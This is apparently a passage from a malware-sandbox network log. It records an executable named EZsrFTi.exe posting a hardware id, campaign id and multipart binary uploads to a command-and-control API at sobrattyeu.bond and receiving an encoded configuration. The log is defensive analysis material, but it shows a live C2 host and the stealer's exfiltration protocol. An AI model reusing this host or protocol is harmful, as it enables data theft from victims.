                            server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1728&rtt_var=668&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1689814&cwnd=180&unsent_bytes=0&cid=ad9859871ebe12ea&ts=514&x=0"
                            2025-01-15 17:11:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2025-01-15 17:11:05 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.1149708104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:06 UTC263OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 52
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:06 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 39 30 26 6a 3d
                            Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--7329910690&j=
                            2025-01-15 17:11:07 UTC1131INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=601pku1014g566l6nd6fppmulf; expires=Sun, 11 May 2025 10:57:46 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIE7vJa3W8utJJm5%2FEzrvK%2BWe6kUtZz%2F7P%2FvxMVcsUKy6Df%2B4kKTi5GoUV2hni9%2Fgi%2BcEW9YlxXEnOlwuiDpjtAwaLIyLxx8Kh8QijzEwOXCfppYddkBuTf3exlizoGoxbs%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277bab9bbd4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1704&rtt_var=650&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=951&delivery_rate=1670480&cwnd=180&unsent_bytes=0&cid=0cc14688a5659e50&ts=982&x=0"
                            2025-01-15 17:11:07 UTC238INData Raw: 34 39 39 34 0d 0a 33 67 68 78 2f 6b 57 31 33 67 76 77 47 44 77 55 53 79 6b 46 66 65 7a 6a 4e 41 39 6f 58 7a 73 77 6c 74 48 72 54 42 2b 42 72 33 4b 6c 4b 67 66 63 66 34 48 79 4b 59 4e 39 48 69 34 2f 57 33 41 59 77 4d 46 56 61 30 70 6c 58 56 48 36 6f 6f 35 67 50 66 66 43 55 4f 52 75 45 4a 49 32 30 50 49 70 6c 57 41 65 4c 68 42 53 4a 78 69 43 77 51 34 74 44 54 56 5a 55 66 71 7a 69 69 64 77 38 63 4d 52 74 6d 51 57 6c 69 44 57 75 6d 71 63 64 56 6c 78 4c 6b 68 76 45 34 57 4f 58 47 4a 4b 63 78 6c 56 37 50 50 52 62 6c 4c 6b 32 78 4f 54 61 51 4b 56 5a 38 6a 79 63 4e 4a 39 55 6a 5a 78 43 32 51 59 6a 6f 39 53 61 77 4d 33 55 31 6a 79 73 6f 38 6d 62 2b 6a 4a 47 72 5a 71 46 5a 63 71 33 36 35 6e 6c 6e 4a 53 64 79 52 49
                            Data Ascii: 49943ghx/kW13gvwGDwUSykFfezjNA9oXzswltHrTB+Br3KlKgfcf4HyKYN9Hi4/W3AYwMFVa0plXVH6oo5gPffCUORuEJI20PIplWAeLhBSJxiCwQ4tDTVZUfqziidw8cMRtmQWliDWumqcdVlxLkhvE4WOXGJKcxlV7PPRblLk2xOTaQKVZ8jycNJ9UjZxC2QYjo9SawM3U1jyso8mb+jJGrZqFZcq365nlnJSdyRI
                            2025-01-15 17:11:07 UTC1369INData Raw: 4a 31 48 4f 68 6b 34 74 55 6e 30 4b 59 50 65 69 6d 44 74 77 38 38 74 51 6f 79 51 4b 33 43 44 62 2f 44 48 53 63 6c 4a 34 4c 45 68 6f 47 49 2b 42 52 47 49 4b 50 6c 46 61 38 4c 6d 47 49 58 4c 74 78 78 65 30 59 78 53 54 49 4e 2b 36 5a 70 45 36 45 44 59 75 55 79 64 48 7a 71 46 47 62 67 6b 70 56 45 4f 30 72 4d 63 33 50 65 54 42 55 4f 51 71 46 5a 49 6d 32 72 78 37 6d 6e 46 56 63 7a 74 41 62 68 4b 44 67 56 74 6e 42 54 35 5a 56 66 36 35 68 69 52 35 37 73 41 57 76 47 70 54 30 6d 66 51 70 43 6e 4b 4f 6e 31 7a 4f 55 78 72 43 63 79 37 46 6e 4a 45 4a 42 6c 56 2b 50 50 52 62 6e 58 6d 7a 68 4f 33 5a 52 43 55 4c 4d 57 38 65 35 52 33 57 32 51 76 54 6d 6b 56 6a 5a 4e 63 59 77 77 2b 55 46 6e 39 74 6f 34 71 50 61 32 4e 46 36 51 71 53 39 77 47 32 72 64 6c 6d 47 31 65 4e 6a 59
                            Data Ascii: J1HOhk4tUn0KYPeimDtw88tQoyQK3CDb/DHSclJ4LEhoGI+BRGIKPlFa8LmGIXLtxxe0YxSTIN+6ZpE6EDYuUydHzqFGbgkpVEO0rMc3PeTBUOQqFZIm2rx7mnFVcztAbhKDgVtnBT5ZVf65hiR57sAWvGpT0mfQpCnKOn1zOUxrCcy7FnJEJBlV+PPRbnXmzhO3ZRCULMW8e5R3W2QvTmkVjZNcYww+UFn9to4qPa2NF6QqS9wG2rdlmG1eNjY
                            2025-01-15 17:11:07 UTC1369INData Raw: 70 4e 61 5a 77 77 79 56 46 36 30 2f 63 6b 70 5a 61 4f 56 55 4a 5a 70 42 35 38 74 6c 59 6c 71 6e 48 52 5a 59 47 6c 55 4b 51 62 4f 68 6c 6f 74 55 6e 31 55 55 2f 79 31 6d 79 46 77 34 4d 4d 65 73 32 38 63 6c 43 66 58 73 57 79 57 63 56 56 31 4a 45 39 31 46 59 36 4a 55 32 77 41 4e 78 6b 63 74 4c 53 52 62 69 57 6a 2f 41 65 33 4b 43 61 66 4b 64 6d 37 66 39 4a 6c 45 47 39 70 54 47 74 66 31 73 46 62 5a 51 38 34 56 6c 50 2b 76 59 77 6b 63 65 76 44 45 36 35 6c 46 35 77 72 33 37 5a 6b 6e 48 35 57 66 79 4a 41 59 52 2b 50 69 78 59 6a 53 6a 70 42 45 71 7a 7a 76 53 6c 78 37 73 4a 53 69 57 6b 64 6b 69 44 42 2f 48 62 63 59 78 35 78 4a 51 73 2f 58 34 4b 49 56 6d 59 41 4f 56 6c 56 2b 62 61 4b 4b 58 37 75 79 68 71 79 62 52 65 51 4c 74 71 36 61 5a 56 2b 57 32 51 73 51 6d 73 54
                            Data Ascii: pNaZwwyVF60/ckpZaOVUJZpB58tlYlqnHRZYGlUKQbOhlotUn1UU/y1myFw4MMes28clCfXsWyWcVV1JE91FY6JU2wANxkctLSRbiWj/Ae3KCafKdm7f9JlEG9pTGtf1sFbZQ84VlP+vYwkcevDE65lF5wr37ZknH5WfyJAYR+PixYjSjpBEqzzvSlx7sJSiWkdkiDB/HbcYx5xJQs/X4KIVmYAOVlV+baKKX7uyhqybReQLtq6aZV+W2QsQmsT
                            2025-01-15 17:11:07 UTC1369INData Raw: 74 4b 49 68 64 4c 74 4c 53 46 62 69 57 6a 78 42 6d 75 5a 42 32 56 4b 74 47 30 62 70 78 33 56 58 41 69 54 47 41 5a 67 34 6c 62 61 41 6b 38 58 56 6a 6d 73 49 49 6b 63 4f 6d 4e 58 76 78 74 43 39 78 2f 6c 35 74 6c 75 32 70 46 5a 44 38 4c 65 46 47 58 77 56 46 68 53 6d 55 5a 55 66 75 36 68 69 5a 31 37 4d 49 55 73 6d 77 56 6b 53 4c 59 74 6e 75 61 64 46 4e 39 4a 6b 42 31 48 34 4f 46 57 6d 6b 43 4e 6c 4d 53 75 76 4f 4f 4e 6a 32 37 6a 53 57 78 5a 52 4f 66 4d 5a 65 6a 4a 34 73 36 57 58 70 70 45 79 63 54 67 49 46 5a 59 51 59 32 55 56 50 34 76 59 34 72 64 4f 76 46 41 72 31 75 47 35 30 70 32 4c 31 74 6c 33 39 61 63 53 31 4e 61 46 2f 41 77 56 46 31 53 6d 55 5a 66 64 4f 47 79 77 39 48 6f 39 4a 65 70 53 6f 55 6b 47 65 50 2f 47 57 52 64 6c 5a 35 4c 30 4a 72 46 59 65 4b 57
                            Data Ascii: tKIhdLtLSFbiWjxBmuZB2VKtG0bpx3VXAiTGAZg4lbaAk8XVjmsIIkcOmNXvxtC9x/l5tlu2pFZD8LeFGXwVFhSmUZUfu6hiZ17MIUsmwVkSLYtnuadFN9JkB1H4OFWmkCNlMSuvOONj27jSWxZROfMZejJ4s6WXppEycTgIFZYQY2UVP4vY4rdOvFAr1uG50p2L1tl39acS1NaF/AwVF1SmUZfdOGyw9Ho9JepSoUkGeP/GWRdlZ5L0JrFYeKW
                            2025-01-15 17:11:07 UTC1369INData Raw: 61 56 76 47 38 69 43 39 37 38 63 6f 5a 72 6d 51 65 6b 79 2f 66 74 57 69 57 66 31 4e 77 4a 55 46 6d 47 49 43 50 58 69 31 45 66 56 35 4b 74 4f 76 4a 44 32 33 34 33 77 61 78 53 78 36 54 5a 38 6a 79 63 4e 4a 39 55 6a 5a 78 43 32 34 4e 69 6f 78 45 5a 41 30 7a 56 6c 48 6d 73 6f 51 6c 62 2b 54 43 46 4c 74 6d 46 5a 4d 68 31 72 6c 6a 6e 6e 31 62 66 53 5a 48 4a 31 48 4f 68 6b 34 74 55 6e 31 33 57 65 65 6b 69 69 42 32 39 64 5a 51 6f 79 51 4b 33 43 44 62 2f 44 48 53 65 56 56 39 4c 55 74 72 48 34 71 4d 56 6e 38 46 4f 6c 35 62 2f 36 47 44 4b 58 72 6f 78 52 75 7a 62 41 47 51 4b 63 57 35 65 34 41 36 45 44 59 75 55 79 64 48 7a 72 64 52 66 52 6f 2b 47 32 50 69 73 4a 38 6c 63 4f 2b 4e 44 2f 4a 7a 55 35 73 72 6c 2b 51 70 6c 48 56 58 64 53 5a 4b 62 68 4f 44 68 46 39 6f 43 7a
                            Data Ascii: aVvG8iC978coZrmQeky/ftWiWf1NwJUFmGICPXi1EfV5KtOvJD2343waxSx6TZ8jycNJ9UjZxC24NioxEZA0zVlHmsoQlb+TCFLtmFZMh1rljnn1bfSZHJ1HOhk4tUn13WeekiiB29dZQoyQK3CDb/DHSeVV9LUtrH4qMVn8FOl5b/6GDKXroxRuzbAGQKcW5e4A6EDYuUydHzrdRfRo+G2PisJ8lcO+ND/JzU5srl+QplHVXdSZKbhODhF9oCz
                            2025-01-15 17:11:07 UTC1369INData Raw: 67 59 6f 31 50 66 79 44 43 66 78 74 48 39 78 2f 6c 37 39 75 6b 58 74 55 66 79 56 45 59 42 75 63 69 31 46 2f 43 7a 78 53 58 2f 69 7a 68 43 4e 33 34 73 51 64 73 47 63 55 6d 79 6a 53 2f 43 66 53 66 55 59 32 63 51 74 47 45 6f 57 4e 44 54 64 4b 49 68 64 4c 74 4c 53 46 62 69 57 6a 7a 52 71 35 59 42 36 66 4b 4e 53 75 61 4a 52 6f 58 6e 73 6a 57 57 30 55 69 34 78 62 59 41 6b 37 58 31 6e 34 6f 59 41 75 66 75 69 4e 58 76 78 74 43 39 78 2f 6c 35 39 2b 68 48 42 5a 65 6a 39 41 5a 68 79 59 6a 45 59 74 52 48 31 49 56 65 58 7a 30 54 68 74 39 4d 6f 50 38 6e 4e 54 6d 79 75 58 35 43 6d 55 63 31 68 78 4c 30 56 31 47 6f 69 4f 57 57 51 44 4f 56 46 52 39 4c 65 4e 4b 58 6a 67 77 52 75 37 61 52 79 59 4c 74 6d 31 5a 74 49 30 48 6e 45 78 43 7a 39 66 72 35 70 56 59 51 64 39 52 68 7a
                            Data Ascii: gYo1PfyDCfxtH9x/l79ukXtUfyVEYBuci1F/CzxSX/izhCN34sQdsGcUmyjS/CfSfUY2cQtGEoWNDTdKIhdLtLSFbiWjzRq5YB6fKNSuaJRoXnsjWW0Ui4xbYAk7X1n4oYAufuiNXvxtC9x/l59+hHBZej9AZhyYjEYtRH1IVeXz0Tht9MoP8nNTmyuX5CmUc1hxL0V1GoiOWWQDOVFR9LeNKXjgwRu7aRyYLtm1ZtI0HnExCz9fr5pVYQd9Rhz
                            2025-01-15 17:11:07 UTC1369INData Raw: 44 33 6b 31 56 44 6b 4b 6a 4f 58 4d 64 4b 37 66 39 42 50 58 58 67 6e 54 48 46 66 6b 62 34 59 4c 51 55 6e 47 51 72 4e 71 73 6b 70 63 61 4f 56 55 4b 6c 74 45 35 73 39 77 62 74 6c 67 33 46 54 65 67 74 45 59 41 6d 4e 6a 6c 56 38 41 33 46 53 58 37 54 39 79 53 6c 6c 6f 35 56 51 6b 32 30 46 6e 77 6a 55 72 57 44 53 4e 42 35 78 50 77 73 2f 58 37 44 42 52 47 34 61 50 6c 5a 44 79 76 50 52 4e 30 4f 6a 78 67 61 37 65 68 43 4b 4c 4e 71 77 65 4b 77 36 42 69 4a 37 47 54 56 4e 33 4a 34 57 63 6a 56 7a 47 56 4f 30 36 37 41 33 50 66 57 4e 53 4f 34 6b 55 34 35 6e 6a 2f 77 75 6b 57 68 4d 63 43 70 64 5a 46 69 77 76 33 46 37 41 44 70 4a 56 65 4f 38 79 57 41 39 37 49 31 49 68 53 6f 61 6d 7a 7a 47 71 6d 53 43 66 52 35 4a 5a 77 74 2f 58 39 62 42 59 32 34 45 4d 31 35 45 35 66 36 75
                            Data Ascii: D3k1VDkKjOXMdK7f9BPXXgnTHFfkb4YLQUnGQrNqskpcaOVUKltE5s9wbtlg3FTegtEYAmNjlV8A3FSX7T9ySllo5VQk20FnwjUrWDSNB5xPws/X7DBRG4aPlZDyvPRN0Ojxga7ehCKLNqweKw6BiJ7GTVN3J4WcjVzGVO067A3PfWNSO4kU45nj/wukWhMcCpdZFiwv3F7ADpJVeO8yWA97I1IhSoamzzGqmSCfR5JZwt/X9bBY24EM15E5f6u
                            2025-01-15 17:11:07 UTC1369INData Raw: 55 42 73 57 5a 54 30 6d 66 43 74 32 57 55 64 30 73 35 4f 46 31 6b 43 59 6e 4e 58 6e 77 48 4d 52 6c 74 75 76 4f 52 62 69 57 6a 2b 42 4f 79 5a 42 53 4b 4e 70 71 63 59 70 35 35 55 6e 63 75 43 79 6c 66 69 4d 45 4f 50 6b 52 39 58 55 4f 30 36 39 6c 38 4a 72 61 65 52 2b 77 34 44 4e 49 2b 6c 36 6f 70 79 69 67 51 4e 6a 73 4c 50 31 2f 4a 67 6b 52 2f 44 44 35 50 55 62 4f 4e 74 79 39 77 37 49 45 65 74 32 6f 55 6a 44 48 4d 38 47 47 52 59 45 52 49 46 32 42 72 47 59 6d 62 55 57 73 73 48 52 6b 63 74 4c 7a 4a 64 6b 53 6a 68 56 43 44 4a 46 4f 45 5a 34 2f 38 58 4a 46 30 55 48 45 2f 57 69 6f 33 72 62 74 73 4c 79 59 36 54 42 44 41 74 4a 6b 2f 64 75 37 42 55 50 49 71 46 64 78 2f 68 2f 49 70 6c 6d 73 65 4c 6e 6b 5a 50 45 72 64 31 67 59 2f 46 58 4e 41 45 75 4c 7a 30 58 77 7a 6f
                            Data Ascii: UBsWZT0mfCt2WUd0s5OF1kCYnNXnwHMRltuvORbiWj+BOyZBSKNpqcYp55UncuCylfiMEOPkR9XUO069l8JraeR+w4DNI+l6opyigQNjsLP1/JgkR/DD5PUbONty9w7IEet2oUjDHM8GGRYERIF2BrGYmbUWssHRkctLzJdkSjhVCDJFOEZ4/8XJF0UHE/Wio3rbtsLyY6TBDAtJk/du7BUPIqFdx/h/IplmseLnkZPErd1gY/FXNAEuLz0Xwzo
                            2025-01-15 17:11:07 UTC1369INData Raw: 71 42 64 78 2f 68 50 49 70 67 44 6f 47 4e 6d 35 46 61 68 36 4e 6a 31 56 2f 47 44 74 61 52 50 66 30 74 78 42 59 37 73 41 56 73 6d 30 74 6f 67 62 64 72 47 53 64 66 52 78 57 4c 6c 31 6b 49 62 43 32 52 32 6f 61 66 33 39 52 34 72 44 4a 59 44 33 37 6a 55 6a 38 53 78 6d 4d 4b 74 69 37 4b 37 4a 39 53 48 56 70 42 53 63 62 7a 74 6b 57 53 41 63 77 58 46 7a 7a 38 61 67 6b 62 65 37 43 46 2f 35 4b 46 49 6f 6b 6c 2f 49 70 6e 6a 6f 47 4e 69 68 42 64 78 4b 42 68 68 70 71 45 44 6f 5a 48 4c 53 39 79 58 59 39 34 73 63 41 73 57 55 55 30 43 48 5a 73 69 6d 4e 4e 45 63 32 50 77 73 2f 54 4d 44 42 52 43 31 53 66 52 35 52 35 71 47 50 4c 57 76 67 69 69 36 43 52 77 47 62 4e 39 54 2b 57 4a 39 2b 53 47 4d 71 57 32 41 68 73 4b 78 45 61 68 6f 2b 47 32 50 69 73 49 6b 67 65 71 4f 44 55 4b
                            Data Ascii: qBdx/hPIpgDoGNm5Fah6Nj1V/GDtaRPf0txBY7sAVsm0togbdrGSdfRxWLl1kIbC2R2oaf39R4rDJYD37jUj8SxmMKti7K7J9SHVpBScbztkWSAcwXFzz8agkbe7CF/5KFIokl/IpnjoGNihBdxKBhhpqEDoZHLS9yXY94scAsWUU0CHZsimNNEc2Pws/TMDBRC1SfR5R5qGPLWvgii6CRwGbN9T+WJ9+SGMqW2AhsKxEaho+G2PisIkgeqODUK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.1149710104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:08 UTC280OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=BF6DZ3JBI07BD1HUH
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 12846
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:08 UTC12846OUTData Raw: 2d 2d 42 46 36 44 5a 33 4a 42 49 30 37 42 44 31 48 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 42 46 36 44 5a 33 4a 42 49 30 37 42 44 31 48 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 46 36 44 5a 33 4a 42 49 30 37 42 44 31 48 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36
                            Data Ascii: --BF6DZ3JBI07BD1HUHContent-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--BF6DZ3JBI07BD1HUHContent-Disposition: form-data; name="pid"2--BF6DZ3JBI07BD1HUHContent-Disposition: form-data; name="lid"yau6Na--73299106
                            2025-01-15 17:11:08 UTC1124INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=f2qpmh421n38p6d6tn675mi5s3; expires=Sun, 11 May 2025 10:57:47 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqDvZ%2FJ2%2BLAISaEYp9K1MnPSJkryQ8eq6aIKiIzeHBHaUrop01Z1iYkwGUdPUbtN0l2UDqo6AERhaOb7EXyTERODlK1Y6QhOTZI79qBV8wxpjQx44AyNA6ccIuGXPxU7MWA%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277bb45b3342e9-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1689&rtt_var=665&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13784&delivery_rate=1607929&cwnd=241&unsent_bytes=0&cid=49df91ec57d0fd3f&ts=773&x=0"
                            2025-01-15 17:11:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                            Data Ascii: fok 8.46.123.189
                            2025-01-15 17:11:08 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.1149715104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:09 UTC281OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=4QHHLDZZVBYITK5MH8
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 15064
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:09 UTC15064OUTData Raw: 2d 2d 34 51 48 48 4c 44 5a 5a 56 42 59 49 54 4b 35 4d 48 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 34 51 48 48 4c 44 5a 5a 56 42 59 49 54 4b 35 4d 48 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 51 48 48 4c 44 5a 5a 56 42 59 49 54 4b 35 4d 48 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39
                            Data Ascii: --4QHHLDZZVBYITK5MH8Content-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--4QHHLDZZVBYITK5MH8Content-Disposition: form-data; name="pid"2--4QHHLDZZVBYITK5MH8Content-Disposition: form-data; name="lid"yau6Na--73299
                            2025-01-15 17:11:10 UTC1123INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=b4funlel842i3c7fqi4kkestgm; expires=Sun, 11 May 2025 10:57:48 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIVIOVhXC7dMqcH9g65gH4o71ADHtkYbtpQrOBeLfCkcrS9FWcB5dbWY7Cw1bQVpRODB1uYIjN7rT8sApbRxiG%2BxCCUbxwAmeBNWzmzODT45vTbspgAWyu1V4ZuXcqNxdRw%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277bbd1c0b8ca1-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=746&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16003&delivery_rate=1466599&cwnd=168&unsent_bytes=0&cid=0901805f80c9532d&ts=688&x=0"
                            2025-01-15 17:11:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                            Data Ascii: fok 8.46.123.189
                            2025-01-15 17:11:10 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.1149727104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:10 UTC282OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=G7J5MQQ4QJR3QLITMQS
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 20439
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:10 UTC15331OUTData Raw: 2d 2d 47 37 4a 35 4d 51 51 34 51 4a 52 33 51 4c 49 54 4d 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 47 37 4a 35 4d 51 51 34 51 4a 52 33 51 4c 49 54 4d 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 37 4a 35 4d 51 51 34 51 4a 52 33 51 4c 49 54 4d 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33
                            Data Ascii: --G7J5MQQ4QJR3QLITMQSContent-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--G7J5MQQ4QJR3QLITMQSContent-Disposition: form-data; name="pid"3--G7J5MQQ4QJR3QLITMQSContent-Disposition: form-data; name="lid"yau6Na--73
                            2025-01-15 17:11:10 UTC5108OUTData Raw: 00 00 00 00 00 00 00 60 93 eb 8b 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00
                            Data Ascii: `M?lrQM/64G6(X&~`aO
                            2025-01-15 17:11:11 UTC1130INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=mi65k408msmol3r8c8j7ta2o5i; expires=Sun, 11 May 2025 10:57:50 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
